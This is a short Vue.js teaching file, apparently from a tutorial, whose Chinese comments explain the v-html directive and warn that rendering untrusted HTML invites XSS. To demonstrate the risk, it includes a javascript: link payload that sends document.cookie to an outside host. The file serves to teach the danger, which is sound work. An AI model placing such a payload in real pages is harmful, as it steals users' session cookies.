<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <!-- 
v-html指令：
1.作用：向指定节点中渲染包含html结构的内容
2.与插值语法的区别
v-html会替换掉节点中所有的内容，{{xx}}则不会
v-html可以识别html结构
3.严重注意：v-html有安全性问题
在网站上动态渲染任意HTML是非常危险的，容易导致xss攻击
一定要在可信的内容上使用v-html，永不要用在用户提交的内容上！ 提交就会怎么样了呢？

     -->
</head>
<body>
    <div id="root">
        <div v-html="msg">问问</div>  
        <div v-html="str2"></div>
    </div>
    <script src="vue.js"></script>
    <script>
        Vue.config.productionTip = false
        new Vue({
            el:"#root",
            data:{
                msg:'<h3>你好啊</h3>',
                str2:'<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>资源</a>'  //这样资源就都给坏人了
            }
        })
    </script>
    </script>

</body>
</html>